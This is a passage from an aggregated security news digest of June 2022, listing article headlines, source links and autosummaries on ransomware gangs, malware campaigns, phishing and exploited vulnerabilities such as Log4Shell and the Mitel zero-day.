                18 | CWE-306 | Missing Authentication for Critical Function | 5.15 | 6 | -7
                19 | CWE-119 | Improper Restriction of Operations within the Bounds of a Memory Buffer | 4.85 | 6 | -2
                20 | CWE-276 | Incorrect Default Permissions | 4.84 | 0 | -1
                21 | CWE-918 | Server-Side Request Forgery (SSRF) | 4.27 | 8 | +3
                22 | CWE-362 | Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition") | 3.57 | 6 | +11
                23 | CWE-400 | Uncontrolled Resource Consumption | 3.56 | 2 | +4
                24 | CWE-611 | Improper Restriction of XML External Entity Reference | 3.38 | 0 | -1
                25 | CWE-94 | Improper Control of Generation of Code ("Code Injection") | 3.32 | 4 | +3
                Top exploited vulnerabilities of 2021: In April, in partnership with the FBI and the NSA, cybersecurity authorities worldwide also published a list of the top 15 vulnerabilities frequently exploited by threat actors during 2021. "


                Windows 10 KB5014666 update brings new printing features, bug fixes

                exploits
                2022-06-28 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5014666-update-brings-new-printing-features-bug-fixes/
                Microsoft has released the optional KB5014666 Preview cumulative update for Windows 10 20H2, Windows 10 21H1, and Windows 10 21H2. [...] "

                Autosummary: In addition to the new printing features, the Windows 10 KB5014666 cumulative update preview includes twenty-six other improvements or fixes, with the two highlighted ones below: Addresses a known issue that might prevent you from using the Wi-Fi hotspot feature. "


                NON-STATE ACTORS IN THE CYBERSPACE: AN ATTEMPT TO A TAXONOMIC CLASSIFICATION, ROLE, IMPACT AND RELATIONS WITH A STATE’S SOCIOECONOMIC STRUCTURE

                government
                2022-06-28 https://securityaffairs.co/wordpress/132716/hacking/non-state-actors-cyberspace.html

                This paper provides a taxonomic classification of non-state actors in cyberspace, analyzing their role and impact on a state’s socioeconomic structure. Cyber Non-State Actors (CNSA) are key figures in our globalized world: their operations could have a significant impact on international affairs, politics, and on the economy, as much as states do. Non-state actors […]

                The post NON-STATE ACTORS IN THE CYBERSPACE: AN ATTEMPT TO A TAXONOMIC CLASSIFICATION, ROLE, IMPACT AND RELATIONS WITH A STATE’S SOCIOECONOMIC STRUCTURE appeared first on Security Affairs.

                "

                Autosummary: Non-state actors include multinational corporations, collectives of hacktivists, non-governmental organizations (NGOs), cybercrime syndicates, private military organizations, media outlets, terrorist groups, labor unions, organized ethnic groups, lobby groups, criminal organizations, private businesses, and others. "


                ZuoRAT malware hijacks SOHO Routers to spy on the victims

                exploits
                2022-06-28 https://securityaffairs.co/wordpress/132709/hacking/zuorat-soho-campaign.html

                A new RAT dubbed ZuoRAT was employed in a campaign aimed at small office/home office (SOHO) routers in North America and Europe. Researchers from Black Lotus Labs, the threat intelligence division of Lumen Technologies, have discovered a new remote access trojan (RAT) called ZuoRAT, which targets small office/home office (SOHO) devices of remote workers during COVID-19 […]

                The post ZuoRAT malware hijacks SOHO Routers to spy on the victims appeared first on Security Affairs.

                "

                Autosummary: “The capabilities demonstrated in this campaign — gaining access to SOHO devices of different makes and models, collecting host and LAN information to inform targeting, sampling and hijacking network communications to gain potentially persistent access to in-land devices and intentionally stealth C2 infrastructure leveraging multistage siloed router to router communications — points to a highly sophisticated actor,” the researchers concluded. "


                Carnival Cruises bruised by $6.25 million fine after series of cyberattacks

                ciber
                2022-06-28 https://www.bitdefender.com/blog/hotforsecurity/carnival-cruises-bruised-by-6-25-million-find-after-series-of-cyberattacks/
                Carnival Cruises, the world's largest travel leisure firm which operates over 100 ships for millions of vacationing customers, has been fined a total of $6.25 million following a series of security mishaps. Read more in my article on the Hot for Security blog. "

                Autosummary: Details exposed included guests' names, addresses, social security numbers, passport or driving license details, credit card and financial account information, and health-related information. "


                Cybercriminals use Azure Front Door in phishing attacks

                financial
                2022-06-27 https://www.helpnetsecurity.com/2022/06/27/azure-front-door-phishing-attacks/

                Resecurity, Inc. (USA) has identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. The identified resources in one of the malicious campaigns impersonated various services appearing to be legitimately created on the “azurefd.net” domain. This allows the bad actors to trick users and spread phishing content to intercept credentials from business applications and e-mail accounts. Notably, most phishing resources were designed to target SendGrid, Docusign … More

                The post Cybercriminals use Azure Front Door in phishing attacks appeared first on Help Net Security.

                "

                Autosummary: Some instances of this campaign began around the month of March 2022 and were focused primarily on Japan and hosted on Kagoya VPS resources. "


                How phishing attacks are becoming more sophisticated

                financial
                2022-06-27 https://www.helpnetsecurity.com/2022/06/27/how-phishing-attacks-are-becoming-more-sophisticated-video/

                The latest APWG’s Phishing Activity Trends Report reveals that in the first quarter of 2022 there were 1,025,968 total phishing attacks—the worst quarter for phishing observed to date. This quarter was the first time the three-month total has exceeded one million. There were 384,291 attacks in March 2022, which was a record monthly total. In this video for Help Net Security, Joshua Crumbaugh, CEO, PhishFirewall, talks about how cybercriminals are taking their phishing attacks to … More

                The post How phishing attacks are becoming more sophisticated appeared first on Help Net Security.

                "

                Autosummary: "


                Researchers Warn of "Matanbuchus" Malware Campaign Dropping Cobalt Strike Beacons

                exploits
                2022-06-27 https://thehackernews.com/2022/06/researchers-warn-of-matanbuchus-malware.html
                A malware-as-a-service (MaaS) dubbed Matanbuchus has been observed spreading through phishing campaigns, ultimately dropping the Cobalt Strike post-exploitation framework on compromised machines. Matanbuchus, like other malware loaders such as BazarLoader, Bumblebee, and Colibri, is engineered to download and execute second-stage executables from command-and-control (C&C) servers on infected "

                Autosummary: The archive file, in turn, includes an MSI installer file that displays a fake error message upon execution while stealthily deploying a DLL file ("main.dll") as well as downloading the same library from a remote server ("telemetrysystemcollection[.]com") as a fallback option. "


                Ukrainian telecommunications operators hit by DarkCrystal RAT malware

                exploits
                2022-06-27 https://securityaffairs.co/wordpress/132651/malware/cert-ua-darkcrystal-rat-attacks.html

                The Ukrainian CERT-UA warns of attacks against Ukrainian telecommunications operators involving the DarkCrystal RAT. The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. The malspam messages have the topic “Free primary legal aid” and use a password-protected attachment “Algorithm of actions of […]

                The post Ukrainian telecommunications operators hit by DarkCrystal RAT malware appeared first on Security Affairs.

                "

                Autosummary: "


                Microsoft Exchange bug abused to hack building automation systems

                exploits
                2022-06-27 https://www.bleepingcomputer.com/news/security/microsoft-exchange-bug-abused-to-hack-building-automation-systems/
                A Chinese-speaking threat actor has hacked into the building automation systems (used to control HVAC, fire, and security functions) of several Asian organizations to backdoor their networks and gain access to more secured areas in their networks. [...] "

                Autosummary: Throughout this campaign, the threat actors also deployed other malware and tools, including the CobaltStrike framework, the PlugX backdoor, web shells, scripts for credential theft, and the open-source nextnet network scanner. "


                LockBit 3.0 introduces the first ransomware bug bounty program

                exploits ransomware
                2022-06-27 https://www.bleepingcomputer.com/news/security/lockbit-30-introduces-the-first-ransomware-bug-bounty-program/
                The LockBit ransomware operation has released "LockBit 3.0," introducing the first ransomware bug bounty program and leaking new extortion tactics and Zcash cryptocurrency payment options. [...] "

                Autosummary: The following are the various bug bounty categories offered by the LockBit 3.0 operation: Web Site Bugs: XSS vulnerabilities, mysql injections, getting a shell to the site and more, will be paid depending on the severity of the bug, the main direction is to get a decryptor through bugs web site, as well as access to the history of correspondence with encrypted companies. LockBit 3.0 bug bounty program (Source: BleepingComputer). With the release of LockBit 3.0, the operation has introduced the first bug bounty program offered by a ransomware gang, asking security researchers to submit bug reports in return for rewards ranging between $1,000 and $1 million. "


                Cybersecurity Experts Warn of Emerging Threat of "Black Basta" Ransomware

                exploits ransomware ciber
                2022-06-27 https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html
                The Black Basta ransomware-as-a-service (RaaS) syndicate has amassed nearly 50 victims in the U.S., Canada, the U.K., Australia, and New Zealand within two months of its emergence in the wild, making it a prominent threat in a short window. "Black Basta has been observed targeting a range of industries, including manufacturing, construction, transportation, telcos, pharmaceuticals, cosmetics, "

                Autosummary: The top five sectors historically targeted by Conti have been manufacturing (14%), real estate (11.1%), logistics (8.2%), professional services (7.1%), and trade (5.5%), with the operators specifically singling out companies in the U.S. (58.4%), Canada (7%), the U.K. (6.6%), Germany (5.8%), France (3.9%), and Italy (3.1%). "


                Cyberattack halted the production at the Iranian state-owned Khuzestan Steel company

                government
                2022-06-27 https://securityaffairs.co/wordpress/132658/cyber-warfare-2/iran-khuzestan-steel-company-cyberattack.html

                Iranian state-owned Khuzestan Steel Company was hit by a cyber attack that forced the company to halt its production. The Khuzestan Steel Company is one of the major steel companies owned by the Iranian government. The company was forced to halt production due to a cyberattack. According to the Associated Press, Khuzestan Steel Company has a monopoly […]

                The post Cyberattack halted the production at the Iranian state-owned Khuzestan Steel company appeared first on Security Affairs.

                "

                Autosummary: Iran is one of the major producers of steel in the Middle East and among the top 10 in the world, according to the World Steel Association. Neither the government of Teheran nor the Khuzestan Steel Company has attributed the attack to a specific threat actor. "


                Android malware ‘Revive’ impersonates BBVA bank’s 2FA app

                financial exploits
                2022-06-27 https://www.bleepingcomputer.com/news/security/android-malware-revive-impersonates-bbva-bank-s-2fa-app/
                A new Android banking malware named Revive has been discovered that impersonates a 2FA application required to log into BBVA bank accounts in Spain. [...] "

                Autosummary: VT scan results for Revive malware (Cleafy). Likely, the narrow targeting, short-term campaigns, and localized operations don't give security vendors many opportunities to record these threats and set identification parameters, so they can fly under the radar for longer. "


                US, Brazil seize 272 websites used to illegally download music

                latam
                2022-06-27 https://www.bleepingcomputer.com/news/security/us-brazil-seize-272-websites-used-to-illegally-download-music/
                The domains of six websites that streamed and provided illegal downloads of copyrighted music were seized by U.S. Homeland Security Investigations (HSI) and the Department of Justice. [...] "

                Autosummary: "


                Vice Society claims ransomware attack on Med. University of Innsbruck

                exploits ransomware
                2022-06-27 https://www.bleepingcomputer.com/news/security/vice-society-claims-ransomware-attack-on-med-university-of-innsbruck/
                The Vice Society ransomware gang has claimed responsibility for last week's cyberattack against the Medical University of Innsbruck, which caused severe IT service disruption and the alleged theft of data. [...] "

                Autosummary: If a ransomware attack is indeed the reason behind last week's disruption, the fact that the hackers posted all data and not just a sample, a full week after the attack occurred, could mean that the negotiations for a ransom payment have reached a dead end, or never took place. "


                Drunk worker loses USB stick containing details of every resident of his city

                government
                2022-06-27 https://www.bitdefender.com/blog/hotforsecurity/drunk-worker-loses-usb-stick-containing-details-of-every-resident-of-his-city/
                A Japanese worker, after a drunken night out, lost a flash drive containing the personal information of every single one of his city's residents. Read more in my article on the Hot for Security blog. "

                Autosummary: The man's employer, a firm called BIPROGY, also apologised: "We deeply apologize to the citizens of Amagasaki, the city of Amagasaki, and all concerned for the inconvenience caused by the loss of important information entrusted to us. "


                The government of Lithuania confirmed it had been hit by an intense cyberattack

                government
                2022-06-27 https://securityaffairs.co/wordpress/132676/cyber-warfare-2/lithuania-massive-ddos.html

                Lithuania confirmed it had been hit by an “intense” cyberattack, after Vilnius imposed restrictions on the rail transit of certain goods to Kaliningrad. The government of Lithuania announced on Monday that it had been hit by an “intense” cyberattack, likely launched from Moscow, days after the Russian government protested restrictions Vilnius imposed on the rail […]

                The post The government of Lithuania confirmed it had been hit by an intense cyberattack appeared first on Security Affairs.

                "

                Autosummary: Targets included ISPs (Tele2, Telia, Penki, Mezon, Cgates, Fastlink); airports (Vilnius Airport, Kaunas Airport, Palanga Airport, Siauliai Airport); energy companies (Ignitis Grupe, Ministry of Energy, Aedilis); major media outlets (Delfi, Nedelia, ZW); and government web resources (President, Ministry of Foreign Affairs, Ministry of Justice, Police). On June 20th one of the units of Cyber Spetsnaz called “Zarya” announced the attack against www.mna.gov.lv, which was one of the first targets of the new campaign. "


                Bank of the West found debit card-stealing skimmers on ATMs

                financial
                2022-06-27 https://www.bleepingcomputer.com/news/security/bank-of-the-west-found-debit-card-stealing-skimmers-on-atms/
                The Bank of the West is warning customers that their debit card numbers and PINs have been stolen by skimmers installed on several of the bank's ATMs. [...] "

                Autosummary: "The ATM skimming device that was installed interfered with the normal debit card transaction and allowed the theft of your card number, the PIN number associated with your card, and possibly your name and address," explains the bank's notice to impacted customers. "


                Critical Security Flaws Identified in CODESYS ICS Automation Software

                industry
                2022-06-27 https://thehackernews.com/2022/06/critical-security-flaws-identified-in.html
                CODESYS has released patches to address as many as 11 security flaws that, if successfully exploited, could result in information disclosure and a denial-of-service (DoS) condition, among others. "These vulnerabilities are simple to exploit, and they can be successfully exploited to cause consequences such as sensitive information leakage, PLCs entering a severe fault state, and arbitrary code "

                Autosummary: "


                Italy Data Protection Authority Warns Websites Against Use of Google Analytics

                industry
                2022-06-27 https://thehackernews.com/2022/06/italy-data-protection-authority-warns.html
                Following the footsteps of Austria and France, the Italian Data Protection Authority has become the latest regulator to find the use of Google Analytics to be non-compliant with E.U. data protection regulations. The Garante per la Protezione dei Dati Personali, in a press release published last week, called out a local web publisher for using the widely used analytics tool in a manner that "

                Autosummary: "


                5 ways cybercriminals steal credit card details

                ciber
                2022-06-27 https://www.welivesecurity.com/2022/06/27/5-ways-cybercriminals-steal-credit-card-details/

                Here are some of the most common ways hackers can get hold of other people’s credit card data – and how you can keep yours safe

                The post 5 ways cybercriminals steal credit card details appeared first on WeLiveSecurity

                "

                Autosummary: At its simplest, it’s a con trick in which the hacker masquerades as a legitimate entity (e.g., a bank, an e-commerce provider, or a tech firm) to trick you into divulging your personal details, or unwittingly downloading malware. Install anti-malware, including anti-phishing protection, from a reputable security vendor on all laptops and other devices. Use two-factor authentication on all sensitive accounts. Public Wi-Fi: When you’re out and about it can be tempting to surf the web for free on public Wi-Fi hotspots – in airports, hotels, cafes, and other shared spaces. SMS phishing (smishing) more than doubled year-on-year in 2021, while voice phishing (vishing) also surged, according to one estimate. "


                Week in review: Log4Shell exploitation, DevSecOps myths, 56 vulnerabilities impacting OT devices

                exploits
                2022-06-26 https://www.helpnetsecurity.com/2022/06/26/week-in-review-log4shell-exploitation-devsecops-myths-56-vulnerabilities-impacting-ot-devices/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: QNAP NAS devices hit by DeadBolt and ech0raix ransomware Taiwan-based QNAP Systems is warning consumers and organizations using their network-attached storage (NAS) appliances of a new DeadBolt ransomware campaign. Fake voicemail notifications are after Office365, Outlook credentials A phishing campaign using fake voicemail notifications has been and is still targeting various US-based organizations, in an attempt to grab employees’ Office365 … More

                The post Week in review: Log4Shell exploitation, DevSecOps myths, 56 vulnerabilities impacting OT devices appeared first on Help Net Security.

                "

                Autosummary: Researchers disclose 56 vulnerabilities impacting thousands of OT devices. In this video for Help Net Security, Daniel dos Santos, Head of Security Research, Forescout, talks about the 56 vulnerabilities, which impact ten vendors, including Bently Nevada, Emerson, Honeywell, JTEKT, Motorola, Omron, Phoenix Contact, Siemens, and Yokogawa. Here’s a look at the event; the featured vendors are: Arctic Wolf Networks, Bridewell, Checkmarx, Cisco, CrowdStrike, Cybereason, Hornetsecurity, (ISC)², Mimecast, Netskope, OneTrust, and Splunk. "


                China-linked APT Bronze Starlight deploys ransomware as a smokescreen

                exploits ransomware
                2022-06-26 https://securityaffairs.co/wordpress/132624/apt/bronze-starlight-deploy-ransomware.html

                China-linked APT Bronze Starlight is deploying post-intrusion ransomware families as a diversionary action to its cyber espionage operations. Researchers from Secureworks reported that a China-linked APT group, tracked as Bronze Starlight (APT10), is deploying post-intrusion ransomware families to cover up the cyber espionage operations. The experts observed an activity cluster involving post-intrusion ransomware such as […]

                The post China-linked APT Bronze Starlight deploys ransomware as a smokescreen appeared first on Security Affairs.

                "

                Autosummary: The experts observed an activity cluster involving post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0. "


                Fake copyright infringement emails install LockBit ransomware

                exploits ransomware
                2022-06-26 https://www.bleepingcomputer.com/news/security/fake-copyright-infringement-emails-install-lockbit-ransomware/
                LockBit ransomware affiliates are using an interesting trick to get people into infecting their devices by disguising their malware as copyright claims. [...] "

                Autosummary: Victims listed by each ransomware operation in May 2022 (NCC Group) The notorious ransomware operation recorded a whopping 95 victims in May alone, whereas Conti, BlackBasta, Hive, and BlackCat collectively had 65. "


                Clever phishing method bypasses MFA using Microsoft WebView2 apps

                financial
                2022-06-26 https://www.bleepingcomputer.com/news/security/clever-phishing-method-bypasses-mfa-using-microsoft-webview2-apps/
                A clever, new phishing technique uses Microsoft Edge WebView2 applications to steal victims' authentication cookies, allowing threat actors to bypass multi-factor authentication when logging into stolen accounts. [...]

                Autosummary: With that said, history has shown us that many people "just run things" without thinking about the ramifications, whether that be email attachments, random downloads off the Internet, cracks and warez, and game cheats. This has led to threat actors and researchers coming up with new ways of bypassing MFA, including zero-day website vulnerabilities, reverse proxies, and clever techniques, such as the Browser in the Browser attack and utilizing VNC to display remote browsers locally.


                Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day

                exploits
                2022-06-26 https://securityaffairs.co/wordpress/132637/cyber-crime/access-vulnerable-networks-atlassian-0day.html

                A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting the recently disclosed Atlassian Confluence zero-day flaw (CVE-2022-26134). The discovery was made by the Rapid7 Threat Intelligence team […]

                The post Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day appeared first on Security Affairs.


                Autosummary: A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting the recently discovered Atlassian Confluence zero-day flaw (CVE-2022-26134).


                Attackers exploited a zero-day in Mitel VOIP devices to compromise a network

                exploits
                2022-06-25 https://securityaffairs.co/wordpress/132588/hacking/mitel-voip-ransomware-attack.html

                Experts warn that threat actors have exploited a zero-day vulnerability in a Mitel VoIP appliance in a ransomware attack. CrowdStrike researchers recently investigated the compromise of a Mitel VoIP appliance used as the entry point in a ransomware attack against an organization's network. The attackers exploited a remote code execution zero-day vulnerability on the Mitel […]

                The post Attackers exploited a zero-day in Mitel VOIP devices to compromise a network appeared first on Security Affairs.


                Autosummary: “A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance,” reads the advisory for this flaw published by the vendor.


                Despite known security issues, VPN usage continues to thrive

                ransomware
                2022-06-24 https://www.helpnetsecurity.com/2022/06/24/vpn-usage-continues-to-thrive/

                VPN usage is still prevalent among 90% of security teams who have highlighted cost, time, and difficulty as reasons to not move forward with ZTNA adoption, according to a new survey conducted by Sapio Research. Furthermore, 97% say that adopting a zero trust model is a priority, with 93% of organizations having committed a budget to enhance their VPN or move toward ZTNA within the next year or two. The last two years have shifted … More

                The post Despite known security issues, VPN usage continues to thrive appeared first on Help Net Security.


                Autosummary: Key drivers for ZTNA: A majority of the respondents (97%) stated that adopting a zero trust model is a priority for their organization, where 44% said they have plans to roll out zero trust but are in the early stages, while 53% said they have already begun to roll out zero trust solutions.


                Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data

                exploits
                2022-06-24 https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. "Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, "



                Attackers still exploit Log4Shell on VMware Horizon servers, CISA warns

                exploits
                2022-06-24 https://www.helpnetsecurity.com/2022/06/24/log4shell-vmware-horizon/

                If your organization is running VMware Horizon and Unified Access Gateway servers and you haven’t implemented the patches or workarounds released in December 2021 to fix or mitigate the Log4Shell vulnerability (CVE-2021-44228), you should treat all those systems as compromised, the Cybersecurity and Infrastructure Security Agency (CISA) advised on Thursday. The agency accompanied the warning with detailed technical information and indicators of compromise related to two separate incident response engagements conducted by CISA and the United States Coast Guard … More

                The post Attackers still exploit Log4Shell on VMware Horizon servers, CISA warns appeared first on Help Net Security.


                Autosummary: According to CISA, cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit Log4Shell in unpatched, internet-facing VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations.


                State-Backed Hackers Using Ransomware as a Decoy for Cyber Espionage Attacks

                exploits government ransomware
                2022-06-24 https://thehackernews.com/2022/06/state-backed-hackers-using-ransomware.html
                A China-based advanced persistent threat (APT) group is possibly deploying short-lived ransomware families as a decoy to cover up the true operational and tactical objectives behind its campaigns. The activity cluster, attributed to a hacking group dubbed Bronze Starlight by Secureworks, involves the deployment of post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, "

                Autosummary: In less than a year, the group is said to have cycled through as many as six different ransomware strains: LockFile (August 2021), Atom Silo (October), Rook (November), Night Sky (December), Pandora (February 2022), and most recently LockBit 2.0 (April).


                Conti ransomware finally shuts down data leak, negotiation sites

                exploits ransomware
                2022-06-24 https://www.bleepingcomputer.com/news/security/conti-ransomware-finally-shuts-down-data-leak-negotiation-sites/
                The Conti ransomware operation has finally shut down its last public-facing infrastructure, consisting of two Tor servers used to leak data and negotiate with victims, closing the final chapter of the notorious cybercrime brand. [...]

                Autosummary: To make matters worse for the gang, other security researchers, and some suspect Ukrainian law enforcement, began doxing Conti/TrickBot members on Twitter, publishing conversations, addresses, social media accounts, and more.


                Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack

                exploits ransomware
                2022-06-24 https://thehackernews.com/2022/06/hackers-exploit-mitel-voip-zero-day-bug.html
                A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment. The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown "



                Threat actors continue to exploit Log4Shell in VMware Horizon Systems

                exploits ransomware
                2022-06-24 https://securityaffairs.co/wordpress/132569/security/log4shell-ongoing-exploitation.html

                The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), published a joint advisory to warn of hacking attempts exploiting the Log4Shell flaw in VMware Horizon servers to […]

                The post Threat actors continue to exploit Log4Shell in VMware Horizon Systems appeared first on Security Affairs.


                Autosummary: “CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches,” reads the advisory.


                Mitel zero-day used by hackers in suspected ransomware attack

                exploits ransomware
                2022-06-24 https://www.bleepingcomputer.com/news/security/mitel-zero-day-used-by-hackers-in-suspected-ransomware-attack/
                Hackers used a zero-day exploit on Linux-based Mitel MiVoice VoIP appliances for initial access in what is believed to be the beginning of a ransomware attack. [...]

                Autosummary: A Mitel zero-day RCE vulnerability: The vulnerability lies in the Mitel Service Appliance component of MiVoice Connect, used in SA 100, SA 400, and Virtual SA, allowing an attacker to perform remote code execution (RCE) in the context of the Service Appliance.


                Fast Shop Brazilian retailer discloses "extortion" cyberattack

                latam
                2022-06-24 https://www.bleepingcomputer.com/news/security/fast-shop-brazilian-retailer-discloses-extortion-cyberattack/
                Fast Shop, one of Brazil's largest retailers, has suffered an "extortion" cyberattack that led to network disruption and the temporary closure of its online store. [...]

                Autosummary: Fast Shop is an online retailer selling a wide range of products, including computers, smartphones, gaming consoles, furniture, beauty products, and home appliances.


                The Week in Ransomware - June 24th 2022 - Splinter Cells

                exploits ransomware
                2022-06-24 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-24th-2022-splinter-cells/
                The Conti ransomware gang has finally ended their charade and turned off their Tor data leak and negotiation sites, effectively shutting down the operation. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @serghei, @jorntvdw, @struppigel, @Seifreed, @PolarToffee, @malwareforme, @VK_Intel, @BleepinComputer, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @DanielGallagher, @fwosar, @FourOctets, @billtoulas, @demonslay335, @CrowdStrike, @felipepayao, @y_advintel, @AdvIntel, @Secureworks, @GroupIB, @GossiTheDog, @juanbrodersen, @PogoWasRight, @pcrisk, @BrettCallow, and @Amigo_A_.


                The surveillance-as-a-service industry needs to be brought to heel

                industry
                2022-06-24 https://www.computerworld.com/article/3665052/the-surveillance-as-a-service-industry-needs-to-be-brought-to-heel.html#tk.rss_security

                Here we go again: another example of government surveillance involving smartphones from Apple and Google has emerged, and it shows how sophisticated government-backed attacks can become and why there's justification for keeping mobile platforms utterly locked down.

                What has happened?

                I don’t intend to focus too much on the news, but in brief it is as follows:

                • Google’s Threat Analysis Group has published information revealing the hack.
                • Italian surveillance firm RCS Labs created the attack.
                • The attack has been used in Italy and Kazakhstan, and possibly elsewhere.
                • Some generations of the attack are wielded with help from ISPs.
                • On iOS, attackers abused Apple’s enterprise certification tools that enable in-house app deployment.
                • Around nine different attacks were used.

                The attack works like this: The target is sent a unique link that aims to trick them into downloading and installing a malicious app. In some cases, the spooks worked with an ISP to disable data connectivity to trick targets into downloading the app to recover that connection.



                Autosummary: And while Apple, Google, and everyone else remain committed to a cat-and-mouse game to prevent such criminality, closing exploits where they can, the risk is that any government-mandated back door or device security flaw will eventually slip into the commercial markets, from which it will reach the criminal ones. Not only this, but these private surveillance companies are enabling dangerous hacking tools to proliferate, while making these high-tech snooping facilities available to governments — some of which seem to enjoy spying on dissidents, journalists, political opponents, and human rights workers. As part of that, they must respect EU law, judicial review, criminal procedural rights and agree to no import of illegal intelligence, no political abuse of national security and to support civil society.


                Inside a large-scale phishing campaign targeting millions of Facebook users

                financial
                2022-06-23 https://www.helpnetsecurity.com/2022/06/23/phishing-campaign-facebook-video/

                In this video for Help Net Security, Nick Ascoli, VP of Threat Research, PIXM, discusses a massive phishing campaign that has successfully stolen an estimated five million Facebook accounts. The campaign continues to spread virally through Facebook Messenger on mobile devices as the primary target vector.

                The post Inside a large-scale phishing campaign targeting millions of Facebook users appeared first on Help Net Security.




                Chinese Hackers Distributing SMS Bomber Tool with Malware Hidden Inside

                exploits
                2022-06-23 https://thehackernews.com/2022/06/chinese-hackers-distributing-sms-bomber.html
                A threat cluster with ties to a hacking group called Tropic Trooper has been spotted using a previously undocumented malware coded in Nim language to strike targets as part of a newly discovered campaign. The novel loader, dubbed Nimbda, is "bundled with a Chinese language greyware "SMS Bomber" tool that is most likely illegally distributed in the Chinese-speaking web," Israeli cybersecurity "



                Critical PHP Vulnerability Exposes QNAP NAS Devices to Remote Attacks

                exploits
                2022-06-23 https://thehackernews.com/2022/06/critical-php-vulnerability-exposes-qnap.html
                QNAP, Taiwanese maker of network-attached storage (NAS) devices, on Wednesday said it's in the process of fixing a critical three-year-old PHP vulnerability that could be abused to achieve remote code execution. "A vulnerability has been reported to affect PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24, and 7.3.x below 7.3.11 with improper nginx config," the hardware vendor said in an "



                Conti ransomware hacking spree breaches over 40 orgs in a month

                exploits ransomware
                2022-06-23 https://www.bleepingcomputer.com/news/security/conti-ransomware-hacking-spree-breaches-over-40-orgs-in-a-month/
                The Conti cybercrime syndicate runs one of the most aggressive ransomware operations and has grown highly organized, to the point that affiliates were able to hack more than 40 companies in a little over a month. [...]

                Autosummary: “Conti’s increased activity and the data leak suggest that ransomware is no longer a game between average malware developers, but an illicit RaaS industry that gives jobs to thousands of cybercriminals worldwide with various specializations” - Ivan Pisarev, Head of Dynamic Malware Analysis Team at Group-IB’s Threat Intelligence team. At the top of the ransomware game: Conti is currently one of the top three ransomware gangs in terms of attack frequency, falling second after LockBit this year, as per data collected from the first quarter of 2022.


                Police seize and dismantle massive phishing operation

                financial
                2022-06-23 https://blog.malwarebytes.com/social-engineering/2022/06/police-seize-and-dismantle-massive-phishing-operation/

                Europol, the Belgian police, and the Dutch police have apprehended members of a cybercriminal gang involved in phishing and other fraud.

                The post Police seize and dismantle massive phishing operation appeared first on Malwarebytes Labs.




                Automotive hose manufacturer hit by ransomware, shuts down production control system

                exploits ransomware
                2022-06-23 https://www.helpnetsecurity.com/2022/06/23/nichirin-ransomware/

                A US subsidiary of Nichirin Co., a Japan-based company manufacturing and selling automotive hoses and hose parts, has been hit with ransomware, which resulted in the shutdown of the subsidiary’s network and production control system. What happened? According to a press release published by Nichirin Co. on Wednesday, the affected subsidiary is Texas-based NICHIRIN-FLEX U.S.A., which experienced “unauthorized access from the outside” on June 14, 2022, which resulted in their server(s?) getting infected with … More

                The post Automotive hose manufacturer hit by ransomware, shuts down production control system appeared first on Help Net Security.


                Autosummary: According to a press release published by Nichirin Co. on Wednesday, the affected subsidiary is Texas-based NICHIRIN-FLEX U.S.A., which experienced “unauthorized access from the outside” on June 14, 2022, which resulted in their server(s?) getting infected with ransomware.


                Automotive hose maker Nichirin hit by ransomware attack

                exploits ransomware
                2022-06-23 https://www.bleepingcomputer.com/news/security/automotive-hose-maker-nichirin-hit-by-ransomware-attack/
                Nichirin-Flex U.S.A., a subsidiary of the Japanese car and motorcycle hose maker Nichirin, has been hit by a ransomware attack, causing the company to take the network offline. [...]



                Chinese hackers use ransomware as decoy for cyber espionage

                exploits ransomware
                2022-06-23 https://www.bleepingcomputer.com/news/security/chinese-hackers-use-ransomware-as-decoy-for-cyber-espionage/
                Two Chinese hacking groups conducting cyber espionage and stealing intellectual property from Japanese and western companies are deploying ransomware as a decoy to cover up their malicious activities. [...]

                Autosummary: C2 domain configured in the observed beacons (Secureworks). The activity and victimology of LockFile, AtomSilo, Rook, Night Sky, and Pandora are unusual compared to financially motivated ransomware operations: each targeted a small number of victims over a brief period and then abandoned the project altogether.


                New MetaMask phishing campaign uses KYC lures to steal passphrases

                financial
